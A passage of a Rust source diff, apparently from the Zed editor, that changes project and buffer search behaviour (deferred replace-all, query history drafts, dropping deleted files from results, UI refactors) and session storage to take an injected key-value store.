(scroll range {scroll_top}..{scroll_bottom})" + ); + }); + } + #[perf] #[gpui::test] async fn test_replace_simple(cx: &mut TestAppContext) { @@ -3116,6 +3203,47 @@ mod tests { .await; } + #[gpui::test] + async fn test_deploy_replace_focuses_replacement_editor(cx: &mut TestAppContext) { + init_globals(cx); + let (editor, search_bar, cx) = init_test(cx); + + editor.update_in(cx, |editor, window, cx| { + editor.change_selections(SelectionEffects::no_scroll(), window, cx, |s| { + s.select_display_ranges([ + DisplayPoint::new(DisplayRow(0), 8)..DisplayPoint::new(DisplayRow(0), 16) + ]) + }); + }); + + search_bar.update_in(cx, |search_bar, window, cx| { + search_bar.deploy( + &Deploy { + focus: true, + replace_enabled: true, + selection_search_enabled: false, + }, + window, + cx, + ); + }); + cx.run_until_parked(); + + search_bar.update_in(cx, |search_bar, window, cx| { + assert!( + search_bar + .replacement_editor + .focus_handle(cx) + .is_focused(window), + "replacement editor should be focused when deploying replace with a selection", + ); + assert!( + !search_bar.query_editor.focus_handle(cx).is_focused(window), + "search editor should not be focused when replacement editor is focused", + ); + }); + } + #[perf] #[gpui::test] async fn test_find_matches_in_selections_singleton_buffer_multiple_selections( @@ -3281,17 +3409,15 @@ mod tests { assert_eq!(initial_location, ToolbarItemLocation::Secondary); - let mut events = cx.events(&search_bar); + let mut events = cx.events::(&search_bar); search_bar.update_in(cx, |search_bar, window, cx| { search_bar.dismiss(&Dismiss, window, cx); }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::Hidden - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::Hidden)) ); search_bar.update_in(cx, |search_bar, window, cx| { @@ -3299,10 +3425,8 @@ mod tests { }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::Secondary - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::Secondary)) ); } @@ -3317,17 +3441,15 @@ mod tests { assert_eq!(initial_location, ToolbarItemLocation::PrimaryLeft); - let mut events = cx.events(&search_bar); + let mut events = cx.events::(&search_bar); search_bar.update_in(cx, |search_bar, window, cx| { search_bar.dismiss(&Dismiss, window, cx); }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::PrimaryLeft - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::PrimaryLeft)) ); search_bar.update_in(cx, |search_bar, window, cx| { @@ -3335,10 +3457,8 @@ mod tests { }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::PrimaryLeft - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::PrimaryLeft)) ); } @@ -3357,17 +3477,15 @@ mod tests { assert_eq!(initial_location, ToolbarItemLocation::Hidden); - let mut events = cx.events(&search_bar); + let mut events = cx.events::(&search_bar); search_bar.update_in(cx, |search_bar, window, cx| { search_bar.dismiss(&Dismiss, window, cx); }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::Hidden - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::Hidden)) ); search_bar.update_in(cx, |search_bar, window, cx| { @@ -3375,10 +3493,8 @@ mod tests { }); assert_eq!( - events.try_next().unwrap(), - Some(ToolbarItemEvent::ChangeLocation( - ToolbarItemLocation::Secondary - )) + events.try_recv().unwrap(), + (ToolbarItemEvent::ChangeLocation(ToolbarItemLocation::Secondary)) ); } @@ -3431,7 +3547,16 @@ mod tests { // Manually unfold one buffer (simulating a chevron click) let first_buffer_id = editor.read_with(cx, |editor, cx| { - editor.buffer().read(cx).excerpt_buffer_ids()[0] + editor + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .nth(0) + .unwrap() + .context + .start + .buffer_id }); editor.update_in(cx, |editor, _window, cx| { editor.unfold_buffer(first_buffer_id, cx); @@ -3445,7 +3570,16 @@ mod tests { // Manually unfold the second buffer too let second_buffer_id = editor.read_with(cx, |editor, cx| { - editor.buffer().read(cx).excerpt_buffer_ids()[1] + editor + .buffer() + .read(cx) + .snapshot(cx) + .excerpts() + .nth(1) + .unwrap() + .context + .start + .buffer_id }); editor.update_in(cx, |editor, _window, cx| { editor.unfold_buffer(second_buffer_id, cx); diff --git a/crates/search/src/project_search.rs b/crates/search/src/project_search.rs index 9b23c96259e4933bc1660af960b508c0678fe767..1bccf1ae52fb2c52a8d01e53aabb1b3ff5c7c16f 100644 --- a/crates/search/src/project_search.rs +++ b/crates/search/src/project_search.rs @@ -4,8 +4,8 @@ use crate::{ ToggleCaseSensitive, ToggleIncludeIgnored, ToggleRegex, ToggleReplace, ToggleWholeWord, buffer_search::Deploy, search_bar::{ - ActionButtonState, alignment_element, input_base_styles, render_action_button, - render_text_input, + ActionButtonState, HistoryNavigationDirection, alignment_element, input_base_styles, + render_action_button, render_text_input, should_navigate_history, }, }; use anyhow::Context as _; @@ -27,6 +27,7 @@ use gpui::{ use itertools::Itertools; use language::{Buffer, Language}; use menu::Confirm; +use multi_buffer; use project::{ Project, ProjectPath, SearchResults, search::{SearchInputKind, SearchQuery}, @@ -239,6 +240,7 @@ pub struct ProjectSearch { search_history_cursor: SearchHistoryCursor, search_included_history_cursor: SearchHistoryCursor, search_excluded_history_cursor: SearchHistoryCursor, + _excerpts_subscription: Subscription, } #[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)] @@ -264,6 +266,7 @@ pub struct ProjectSearchView { excluded_files_editor: Entity, filters_enabled: bool, replace_enabled: bool, + pending_replace_all: bool, included_opened_only: bool, regex_language: Option>, _subscriptions: Vec, @@ -283,10 +286,12 @@ pub struct ProjectSearchBar { impl ProjectSearch { pub fn new(project: Entity, cx: &mut Context) -> Self { let capability = project.read(cx).capability(); + let excerpts = cx.new(|_| MultiBuffer::new(capability)); + let subscription = Self::subscribe_to_excerpts(&excerpts, cx); Self { project, - excerpts: cx.new(|_| MultiBuffer::new(capability)), + excerpts, pending_search: Default::default(), match_ranges: Default::default(), active_query: None, @@ -297,27 +302,76 @@ impl ProjectSearch { search_history_cursor: Default::default(), search_included_history_cursor: Default::default(), search_excluded_history_cursor: Default::default(), + _excerpts_subscription: subscription, } } fn clone(&self, cx: &mut Context) -> Entity { - cx.new(|cx| Self { - project: self.project.clone(), - excerpts: self + cx.new(|cx| { + let excerpts = self .excerpts - .update(cx, |excerpts, cx| cx.new(|cx| excerpts.clone(cx))), - pending_search: Default::default(), - match_ranges: self.match_ranges.clone(), - active_query: self.active_query.clone(), - last_search_query_text: self.last_search_query_text.clone(), - search_id: self.search_id, - no_results: self.no_results, - limit_reached: self.limit_reached, - search_history_cursor: self.search_history_cursor.clone(), - search_included_history_cursor: self.search_included_history_cursor.clone(), - search_excluded_history_cursor: self.search_excluded_history_cursor.clone(), + .update(cx, |excerpts, cx| cx.new(|cx| excerpts.clone(cx))); + let subscription = Self::subscribe_to_excerpts(&excerpts, cx); + + Self { + project: self.project.clone(), + excerpts, + pending_search: Default::default(), + match_ranges: self.match_ranges.clone(), + active_query: self.active_query.clone(), + last_search_query_text: self.last_search_query_text.clone(), + search_id: self.search_id, + no_results: self.no_results, + limit_reached: self.limit_reached, + search_history_cursor: self.search_history_cursor.clone(), + search_included_history_cursor: self.search_included_history_cursor.clone(), + search_excluded_history_cursor: self.search_excluded_history_cursor.clone(), + _excerpts_subscription: subscription, + } + }) + } + fn subscribe_to_excerpts( + excerpts: &Entity, + cx: &mut Context, + ) -> Subscription { + cx.subscribe(excerpts, |this, _, event, cx| { + if matches!(event, multi_buffer::Event::FileHandleChanged) { + this.remove_deleted_buffers(cx); + } }) } + + fn remove_deleted_buffers(&mut self, cx: &mut Context) { + let deleted_buffer_ids = self + .excerpts + .read(cx) + .all_buffers_iter() + .filter(|buffer| { + buffer + .read(cx) + .file() + .is_some_and(|file| file.disk_state().is_deleted()) + }) + .map(|buffer| buffer.read(cx).remote_id()) + .collect::>(); + + if deleted_buffer_ids.is_empty() { + return; + } + + let snapshot = self.excerpts.update(cx, |excerpts, cx| { + for buffer_id in deleted_buffer_ids { + excerpts.remove_excerpts_for_buffer(buffer_id, cx); + } + excerpts.snapshot(cx) + }); + + self.match_ranges + .retain(|range| snapshot.anchor_to_buffer_anchor(range.start).is_some()); + + cx.notify(); + } + fn cursor(&self, kind: SearchInputKind) -> &SearchHistoryCursor { match kind { SearchInputKind::Query => &self.search_history_cursor, @@ -735,6 +789,9 @@ impl ProjectSearchView { } fn replace_next(&mut self, _: &ReplaceNext, window: &mut Window, cx: &mut Context) { + if self.entity.read(cx).pending_search.is_some() { + return; + } if let Some(last_search_query_text) = &self.entity.read(cx).last_search_query_text && self.query_editor.read(cx).text(cx) != *last_search_query_text { @@ -762,14 +819,24 @@ impl ProjectSearchView { self.select_match(Direction::Next, window, cx) } } + fn replace_all(&mut self, _: &ReplaceAll, window: &mut Window, cx: &mut Context) { - if let Some(last_search_query_text) = &self.entity.read(cx).last_search_query_text - && self.query_editor.read(cx).text(cx) != *last_search_query_text - { - // search query has changed, restart search and bail + if self.entity.read(cx).pending_search.is_some() { + self.pending_replace_all = true; + return; + } + let query_text = self.query_editor.read(cx).text(cx); + let query_is_stale = + self.entity.read(cx).last_search_query_text.as_deref() != Some(query_text.as_str()); + if query_is_stale { + self.pending_replace_all = true; self.search(cx); + if self.entity.read(cx).pending_search.is_none() { + self.pending_replace_all = false; + } return; } + self.pending_replace_all = false; if self.active_match_index.is_none() { return; } @@ -858,8 +925,9 @@ impl ProjectSearchView { })); let query_editor = cx.new(|cx| { - let mut editor = Editor::single_line(window, cx); + let mut editor = Editor::auto_height(1, 4, window, cx); editor.set_placeholder_text("Search all files…", window, cx); + editor.set_use_autoclose(false); editor.set_text(query_text, window, cx); editor }); @@ -881,7 +949,7 @@ impl ProjectSearchView { }), ); let replacement_editor = cx.new(|cx| { - let mut editor = Editor::single_line(window, cx); + let mut editor = Editor::auto_height(1, 4, window, cx); editor.set_placeholder_text("Replace in project…", window, cx); if let Some(text) = replacement_text { editor.set_text(text, window, cx); @@ -981,6 +1049,7 @@ impl ProjectSearchView { excluded_files_editor, filters_enabled, replace_enabled: false, + pending_replace_all: false, included_opened_only: false, regex_language: None, _subscriptions: subscriptions, @@ -1474,8 +1543,9 @@ impl ProjectSearchView { SearchInputKind::Exclude => &self.excluded_files_editor, }; - editor.update(cx, |included_editor, cx| { - included_editor.set_text(text, window, cx) + editor.update(cx, |editor, cx| { + editor.set_text(text, window, cx); + editor.request_autoscroll(Autoscroll::fit(), cx); }); } @@ -1521,6 +1591,10 @@ impl ProjectSearchView { cx.emit(ViewEvent::UpdateTab); cx.notify(); + + if self.pending_replace_all && self.entity.read(cx).pending_search.is_none() { + self.replace_all(&ReplaceAll, window, cx); + } } fn update_match_index(&mut self, cx: &mut Context) { @@ -1583,9 +1657,7 @@ impl ProjectSearchView { ) .child( Button::new("filter-paths", "Include/exclude specific paths") - .icon(IconName::Filter) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon(Icon::new(IconName::Filter).size(IconSize::Small)) .key_binding(KeyBinding::for_action_in(&ToggleFilters, &focus_handle, cx)) .on_click(|_event, window, cx| { window.dispatch_action(ToggleFilters.boxed_clone(), cx) @@ -1593,9 +1665,7 @@ impl ProjectSearchView { ) .child( Button::new("find-replace", "Find and replace") - .icon(IconName::Replace) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon(Icon::new(IconName::Replace).size(IconSize::Small)) .key_binding(KeyBinding::for_action_in(&ToggleReplace, &focus_handle, cx)) .on_click(|_event, window, cx| { window.dispatch_action(ToggleReplace.boxed_clone(), cx) @@ -1603,9 +1673,7 @@ impl ProjectSearchView { ) .child( Button::new("regex", "Match with regex") - .icon(IconName::Regex) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon(Icon::new(IconName::Regex).size(IconSize::Small)) .key_binding(KeyBinding::for_action_in(&ToggleRegex, &focus_handle, cx)) .on_click(|_event, window, cx| { window.dispatch_action(ToggleRegex.boxed_clone(), cx) @@ -1613,9 +1681,7 @@ impl ProjectSearchView { ) .child( Button::new("match-case", "Match case") - .icon(IconName::CaseSensitive) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon(Icon::new(IconName::CaseSensitive).size(IconSize::Small)) .key_binding(KeyBinding::for_action_in( &ToggleCaseSensitive, &focus_handle, @@ -1627,9 +1693,7 @@ impl ProjectSearchView { ) .child( Button::new("match-whole-words", "Match whole words") - .icon(IconName::WholeWord) - .icon_position(IconPosition::Start) - .icon_size(IconSize::Small) + .start_icon(Icon::new(IconName::WholeWord).size(IconSize::Small)) .key_binding(KeyBinding::for_action_in( &ToggleWholeWord, &focus_handle, @@ -1926,6 +1990,11 @@ impl ProjectSearchBar { ), ] { if editor.focus_handle(cx).is_focused(window) { + if !should_navigate_history(&editor, HistoryNavigationDirection::Next, cx) { + cx.propagate(); + return; + } + let new_query = search_view.entity.update(cx, |model, cx| { let project = model.project.clone(); @@ -1935,13 +2004,14 @@ impl ProjectSearchBar { .next(model.cursor_mut(kind)) .map(str::to_string) }) { - new_query + Some(new_query) } else { - model.cursor_mut(kind).reset(); - String::new() + model.cursor_mut(kind).take_draft() } }); - search_view.set_search_editor(kind, &new_query, window, cx); + if let Some(new_query) = new_query { + search_view.set_search_editor(kind, &new_query, window, cx); + } } } }); @@ -1968,6 +2038,15 @@ impl ProjectSearchBar { ), ] { if editor.focus_handle(cx).is_focused(window) { + if !should_navigate_history( + &editor, + HistoryNavigationDirection::Previous, + cx, + ) { + cx.propagate(); + return; + } + if editor.read(cx).text(cx).is_empty() && let Some(new_query) = search_view .entity @@ -1982,12 +2061,13 @@ impl ProjectSearchBar { return; } + let current_query = editor.read(cx).text(cx); if let Some(new_query) = search_view.entity.update(cx, |model, cx| { let project = model.project.clone(); project.update(cx, |project, _| { project .search_history_mut(kind) - .previous(model.cursor_mut(kind)) + .previous(model.cursor_mut(kind), ¤t_query) .map(str::to_string) }) }) { @@ -2086,7 +2166,11 @@ impl Render for ProjectSearchBar { .on_action( cx.listener(|this, action, window, cx| this.next_history_query(action, window, cx)), ) - .child(render_text_input(&search.query_editor, color_override, cx)) + .child(div().flex_1().py_1().child(render_text_input( + &search.query_editor, + color_override, + cx, + ))) .child( h_flex() .gap_1() @@ -2244,18 +2328,22 @@ impl Render for ProjectSearchBar { .child(mode_column); let replace_line = search.replace_enabled.then(|| { - let replace_column = input_base_styles(InputPanel::Replacement) - .child(render_text_input(&search.replacement_editor, None, cx)); + let replace_column = input_base_styles(InputPanel::Replacement).child( + div().flex_1().py_1().child(render_text_input( + &search.replacement_editor, + None, + cx, + )), + ); let focus_handle = search.replacement_editor.read(cx).focus_handle(cx); - let replace_actions = h_flex() .min_w_64() .gap_1() .child(render_action_button( "project-search-replace-button", IconName::ReplaceNext, - Default::default(), + is_search_underway.then_some(ActionButtonState::Disabled), "Replace Next Match", &ReplaceNext, focus_handle.clone(), @@ -2519,7 +2607,7 @@ pub mod tests { use gpui::{Action, TestAppContext, VisualTestContext, WindowHandle}; use language::{FakeLspAdapter, rust_lang}; use pretty_assertions::assert_eq; - use project::FakeFs; + use project::{FakeFs, Fs}; use serde_json::json; use settings::{ InlayHintSettingsContent, SettingsStore, ThemeColorsContent, ThemeStyleContent, @@ -2893,7 +2981,13 @@ pub mod tests { .read(cx) .buffer() .read(cx) - .excerpt_buffer_ids()[0] + .snapshot(cx) + .excerpts() + .next() + .unwrap() + .context + .start + .buffer_id }) .expect("should read buffer ids"); @@ -3845,7 +3939,7 @@ pub mod tests { }) .unwrap(); - // Next history query after the latest should set the query to the empty string. + // Next history query after the latest should preserve the current query. window .update(cx, |_, window, cx| { search_bar.update(cx, |search_bar, cx| { @@ -3857,7 +3951,10 @@ pub mod tests { window .update(cx, |_, _, cx| { search_view.update(cx, |search_view, cx| { - assert_eq!(search_view.query_editor.read(cx).text(cx), ""); + assert_eq!( + search_view.query_editor.read(cx).text(cx), + "JUST_TEXT_INPUT" + ); assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE); }); }) @@ -3873,13 +3970,16 @@ pub mod tests { window .update(cx, |_, _, cx| { search_view.update(cx, |search_view, cx| { - assert_eq!(search_view.query_editor.read(cx).text(cx), ""); + assert_eq!( + search_view.query_editor.read(cx).text(cx), + "JUST_TEXT_INPUT" + ); assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE); }); }) .unwrap(); - // First previous query for empty current query should set the query to the latest submitted one. + // Previous query should navigate backwards through history. window .update(cx, |_, window, cx| { search_bar.update(cx, |search_bar, cx| { @@ -3891,7 +3991,7 @@ pub mod tests { window .update(cx, |_, _, cx| { search_view.update(cx, |search_view, cx| { - assert_eq!(search_view.query_editor.read(cx).text(cx), "THREE"); + assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO"); assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE); }); }) @@ -3909,7 +4009,7 @@ pub mod tests { window .update(cx, |_, _, cx| { search_view.update(cx, |search_view, cx| { - assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO"); + assert_eq!(search_view.query_editor.read(cx).text(cx), "ONE"); assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE); }); }) @@ -4063,11 +4163,75 @@ pub mod tests { window .update(cx, |_, _, cx| { search_view.update(cx, |search_view, cx| { - assert_eq!(search_view.query_editor.read(cx).text(cx), ""); + assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO_NEW"); assert_eq!(search_view.search_options, SearchOptions::CASE_SENSITIVE); }); }) .unwrap(); + + // Typing text without running a search, then navigating history, should allow + // restoring the draft when pressing next past the end. + window + .update(cx, |_, window, cx| { + search_view.update(cx, |search_view, cx| { + search_view.query_editor.update(cx, |query_editor, cx| { + query_editor.set_text("unsaved draft", window, cx) + }); + }) + }) + .unwrap(); + cx.background_executor.run_until_parked(); + + // Navigate up into history — the draft should be stashed. + window + .update(cx, |_, window, cx| { + search_bar.update(cx, |search_bar, cx| { + search_bar.focus_search(window, cx); + search_bar.previous_history_query(&PreviousHistoryQuery, window, cx); + }); + }) + .unwrap(); + window + .update(cx, |_, _, cx| { + search_view.update(cx, |search_view, cx| { + assert_eq!(search_view.query_editor.read(cx).text(cx), "THREE"); + }); + }) + .unwrap(); + + // Navigate forward through history. + window + .update(cx, |_, window, cx| { + search_bar.update(cx, |search_bar, cx| { + search_bar.focus_search(window, cx); + search_bar.next_history_query(&NextHistoryQuery, window, cx); + }); + }) + .unwrap(); + window + .update(cx, |_, _, cx| { + search_view.update(cx, |search_view, cx| { + assert_eq!(search_view.query_editor.read(cx).text(cx), "TWO_NEW"); + }); + }) + .unwrap(); + + // Navigate past the end — the draft should be restored. + window + .update(cx, |_, window, cx| { + search_bar.update(cx, |search_bar, cx| { + search_bar.focus_search(window, cx); + search_bar.next_history_query(&NextHistoryQuery, window, cx); + }); + }) + .unwrap(); + window + .update(cx, |_, _, cx| { + search_view.update(cx, |search_view, cx| { + assert_eq!(search_view.query_editor.read(cx).text(cx), "unsaved draft"); + }); + }) + .unwrap(); } #[perf] @@ -4253,9 +4417,6 @@ pub mod tests { cx.background_executor.run_until_parked(); select_next_history_item(&search_bar_2, cx); - assert_eq!(active_query(&search_view_2, cx), ""); - - select_prev_history_item(&search_bar_2, cx); assert_eq!(active_query(&search_view_2, cx), "THREE"); select_prev_history_item(&search_bar_2, cx); @@ -4267,6 +4428,9 @@ pub mod tests { select_prev_history_item(&search_bar_2, cx); assert_eq!(active_query(&search_view_2, cx), "ONE"); + select_prev_history_item(&search_bar_2, cx); + assert_eq!(active_query(&search_view_2, cx), "ONE"); + // Search view 1 should now see the query from search view 2. assert_eq!(active_query(&search_view_1, cx), "ONE"); @@ -4278,7 +4442,7 @@ pub mod tests { assert_eq!(active_query(&search_view_2, cx), "THREE"); select_next_history_item(&search_bar_2, cx); - assert_eq!(active_query(&search_view_2, cx), ""); + assert_eq!(active_query(&search_view_2, cx), "THREE"); select_next_history_item(&search_bar_1, cx); assert_eq!(active_query(&search_view_1, cx), "TWO"); @@ -4287,7 +4451,7 @@ pub mod tests { assert_eq!(active_query(&search_view_1, cx), "THREE"); select_next_history_item(&search_bar_1, cx); - assert_eq!(active_query(&search_view_1, cx), ""); + assert_eq!(active_query(&search_view_1, cx), "THREE"); } #[perf] @@ -4887,12 +5051,97 @@ pub mod tests { .unwrap(); } + #[gpui::test] + async fn test_deleted_file_removed_from_search_results(cx: &mut TestAppContext) { + init_test(cx); + + let fs = FakeFs::new(cx.background_executor.clone()); + fs.insert_tree( + path!("/dir"), + json!({ + "file_a.txt": "hello world", + "file_b.txt": "hello universe", + }), + ) + .await; + + let project = Project::test(fs.clone(), [path!("/dir").as_ref()], cx).await; + let window = + cx.add_window(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); + let workspace = window + .read_with(cx, |mw, _| mw.workspace().clone()) + .unwrap(); + let search = cx.new(|cx| ProjectSearch::new(project.clone(), cx)); + let search_view = cx.add_window(|window, cx| { + ProjectSearchView::new(workspace.downgrade(), search.clone(), window, cx, None) + }); + + perform_search(search_view, "hello", cx); + + search_view + .update(cx, |search_view, _window, cx| { + let match_count = search_view.entity.read(cx).match_ranges.len(); + assert_eq!(match_count, 2, "Should have matches from both files"); + }) + .unwrap(); + + // Delete file_b.txt + fs.remove_file( + path!("/dir/file_b.txt").as_ref(), + fs::RemoveOptions::default(), + ) + .await + .unwrap(); + cx.run_until_parked(); + + // Verify deleted file's results are removed proactively + search_view + .update(cx, |search_view, _window, cx| { + let results_text = search_view + .results_editor + .update(cx, |editor, cx| editor.display_text(cx)); + assert!( + !results_text.contains("universe"), + "Deleted file's content should be removed from results, got: {results_text}" + ); + assert!( + results_text.contains("world"), + "Remaining file's content should still be present, got: {results_text}" + ); + }) + .unwrap(); + + // Re-run the search and verify deleted file stays gone + perform_search(search_view, "hello", cx); + + search_view + .update(cx, |search_view, _window, cx| { + let results_text = search_view + .results_editor + .update(cx, |editor, cx| editor.display_text(cx)); + assert!( + !results_text.contains("universe"), + "Deleted file should not reappear after re-search, got: {results_text}" + ); + assert!( + results_text.contains("world"), + "Remaining file should still be found, got: {results_text}" + ); + assert_eq!( + search_view.entity.read(cx).match_ranges.len(), + 1, + "Should only have match from the remaining file" + ); + }) + .unwrap(); + } + fn init_test(cx: &mut TestAppContext) { cx.update(|cx| { let settings = SettingsStore::test(cx); cx.set_global(settings); - theme::init(theme::LoadThemes::JustBase, cx); + theme_settings::init(theme::LoadThemes::JustBase, cx); editor::init(cx); crate::init(cx); diff --git a/crates/search/src/search.rs b/crates/search/src/search.rs index d2104492bebf529821f8ad8571fd3fbb8bdbc69e..8edcdd600bd352d4e33c0c8c1ec9aed3f427c71c 100644 --- a/crates/search/src/search.rs +++ b/crates/search/src/search.rs @@ -85,7 +85,7 @@ pub enum SearchOption { Backwards, } -pub(crate) enum SearchSource<'a, 'b> { +pub enum SearchSource<'a, 'b> { Buffer, Project(&'a Context<'b, ProjectSearchBar>), } @@ -126,7 +126,7 @@ impl SearchOption { } } - pub(crate) fn as_button( + pub fn as_button( &self, active: SearchOptions, search_source: SearchSource, diff --git a/crates/search/src/search_bar.rs b/crates/search/src/search_bar.rs index 690b2eb927ce7384b7e6e313aeb5c825c544cdc9..a4757631a188752aed7cc631d987a22cd57b06c6 100644 --- a/crates/search/src/search_bar.rs +++ b/crates/search/src/search_bar.rs @@ -1,10 +1,37 @@ -use editor::{Editor, EditorElement, EditorStyle}; -use gpui::{Action, Entity, FocusHandle, Hsla, IntoElement, TextStyle}; +use editor::{Editor, EditorElement, EditorStyle, MultiBufferOffset, ToOffset}; +use gpui::{Action, App, Entity, FocusHandle, Hsla, IntoElement, TextStyle}; use settings::Settings; -use theme::ThemeSettings; +use theme_settings::ThemeSettings; use ui::{IconButton, IconButtonShape}; use ui::{Tooltip, prelude::*}; +pub(super) enum HistoryNavigationDirection { + Previous, + Next, +} + +pub(super) fn should_navigate_history( + editor: &Entity, + direction: HistoryNavigationDirection, + cx: &App, +) -> bool { + let editor_ref = editor.read(cx); + let snapshot = editor_ref.buffer().read(cx).snapshot(cx); + if snapshot.max_point().row == 0 { + return true; + } + let selections = editor_ref.selections.disjoint_anchors(); + if let [selection] = selections { + let offset = selection.end.to_offset(&snapshot); + match direction { + HistoryNavigationDirection::Previous => offset == MultiBufferOffset(0), + HistoryNavigationDirection::Next => offset == snapshot.len(), + } + } else { + true + } +} + pub(super) enum ActionButtonState { Disabled, Toggled, @@ -43,7 +70,7 @@ pub(crate) fn input_base_styles(border_color: Hsla, map: impl FnOnce(Div) -> Div h_flex() .map(map) .min_w_32() - .h_8() + .min_h_8() .pl_2() .pr_1() .border_1() diff --git a/crates/search/src/search_status_button.rs b/crates/search/src/search_status_button.rs index 712a322c1094f28ea601d6d170e7be1e395e25f7..5faab32d424df832f55d18059b4485c77eaccdfb 100644 --- a/crates/search/src/search_status_button.rs +++ b/crates/search/src/search_status_button.rs @@ -1,15 +1,20 @@ use editor::EditorSettings; +use gpui::FocusHandle; use settings::Settings as _; use ui::{ButtonCommon, Clickable, Context, Render, Tooltip, Window, prelude::*}; use workspace::{ItemHandle, StatusItemView}; pub const SEARCH_ICON: IconName = IconName::MagnifyingGlass; -pub struct SearchButton; +pub struct SearchButton { + pane_item_focus_handle: Option, +} impl SearchButton { pub fn new() -> Self { - Self {} + Self { + pane_item_focus_handle: None, + } } } @@ -21,11 +26,25 @@ impl Render for SearchButton { return button.hidden(); } + let focus_handle = self.pane_item_focus_handle.clone(); button.child( IconButton::new("project-search-indicator", SEARCH_ICON) .icon_size(IconSize::Small) - .tooltip(|_window, cx| { - Tooltip::for_action("Project Search", &workspace::DeploySearch::default(), cx) + .tooltip(move |_window, cx| { + if let Some(focus_handle) = &focus_handle { + Tooltip::for_action_in( + "Project Search", + &workspace::DeploySearch::default(), + focus_handle, + cx, + ) + } else { + Tooltip::for_action( + "Project Search", + &workspace::DeploySearch::default(), + cx, + ) + } }) .on_click(cx.listener(|_this, _, window, cx| { window.dispatch_action(Box::new(workspace::DeploySearch::default()), cx); @@ -37,9 +56,10 @@ impl Render for SearchButton { impl StatusItemView for SearchButton { fn set_active_pane_item( &mut self, - _active_pane_item: Option<&dyn ItemHandle>, + active_pane_item: Option<&dyn ItemHandle>, _window: &mut Window, - _cx: &mut Context, + cx: &mut Context, ) { + self.pane_item_focus_handle = active_pane_item.map(|item| item.item_focus_handle(cx)); } } diff --git a/crates/session/src/session.rs b/crates/session/src/session.rs index de6be034f9732f2c24dd860ebccd0c677d4fc623..76f2398b382cf1c1a6d2f8da687f7e352acb8c3b 100644 --- a/crates/session/src/session.rs +++ b/crates/session/src/session.rs @@ -1,4 +1,4 @@ -use db::kvp::KEY_VALUE_STORE; +use db::kvp::KeyValueStore; use gpui::{App, AppContext as _, Context, Subscription, Task, WindowId}; use util::ResultExt; @@ -12,20 +12,19 @@ const SESSION_ID_KEY: &str = "session_id"; const SESSION_WINDOW_STACK_KEY: &str = "session_window_stack"; impl Session { - pub async fn new(session_id: String) -> Self { - let old_session_id = KEY_VALUE_STORE.read_kvp(SESSION_ID_KEY).ok().flatten(); + pub async fn new(session_id: String, db: KeyValueStore) -> Self { + let old_session_id = db.read_kvp(SESSION_ID_KEY).ok().flatten(); - KEY_VALUE_STORE - .write_kvp(SESSION_ID_KEY.to_string(), session_id.clone()) + db.write_kvp(SESSION_ID_KEY.to_string(), session_id.clone()) .await .log_err(); - let old_window_ids = KEY_VALUE_STORE + let old_window_ids = db .read_kvp(SESSION_WINDOW_STACK_KEY) .ok() .flatten() .and_then(|json| serde_json::from_str::>(&json).ok()) - .map(|vec| { + .map(|vec: Vec| { vec.into_iter() .map(WindowId::from) .collect::>() @@ -72,25 +71,28 @@ impl AppSession { let _subscriptions = vec![cx.on_app_quit(Self::app_will_quit)]; #[cfg(not(any(test, feature = "test-support")))] - let _serialization_task = cx.spawn(async move |_, cx| { - // Disabled in tests: the infinite loop bypasses "parking forbidden" checks, - // causing tests to hang instead of panicking. - { - let mut current_window_stack = Vec::new(); - loop { - if let Some(windows) = cx.update(|cx| window_stack(cx)) - && windows != current_window_stack - { - store_window_stack(&windows).await; - current_window_stack = windows; + let _serialization_task = { + let db = KeyValueStore::global(cx); + cx.spawn(async move |_, cx| { + // Disabled in tests: the infinite loop bypasses "parking forbidden" checks, + // causing tests to hang instead of panicking. + { + let mut current_window_stack = Vec::new(); + loop { + if let Some(windows) = cx.update(|cx| window_stack(cx)) + && windows != current_window_stack + { + store_window_stack(db.clone(), &windows).await; + current_window_stack = windows; + } + + cx.background_executor() + .timer(std::time::Duration::from_millis(500)) + .await; } - - cx.background_executor() - .timer(std::time::Duration::from_millis(500)) - .await; } - } - }); + }) + }; #[cfg(any(test, feature = "test-support"))] let _serialization_task = Task::ready(()); @@ -104,7 +106,8 @@ impl AppSession { fn app_will_quit(&mut self, cx: &mut Context) -> Task<()> { if let Some(window_stack) = window_stack(cx) { - cx.background_spawn(async move { store_window_stack(&window_stack).await }) + let db = KeyValueStore::global(cx); + cx.background_spawn(async move { store_window_stack(db, &window_stack).await }) } else { Task::ready(()) } @@ -137,10 +140,9 @@ fn window_stack(cx: &App) -> Option> { ) } -async fn store_window_stack(windows: &[u64]) { +async fn store_window_stack(db: KeyValueStore, windows: &[u64]) { if let Ok(window_ids_json) = serde_json::to_string(windows) { - KEY_VALUE_STORE - .write_kvp(SESSION_WINDOW_STACK_KEY.to_string(), window_ids_json) + 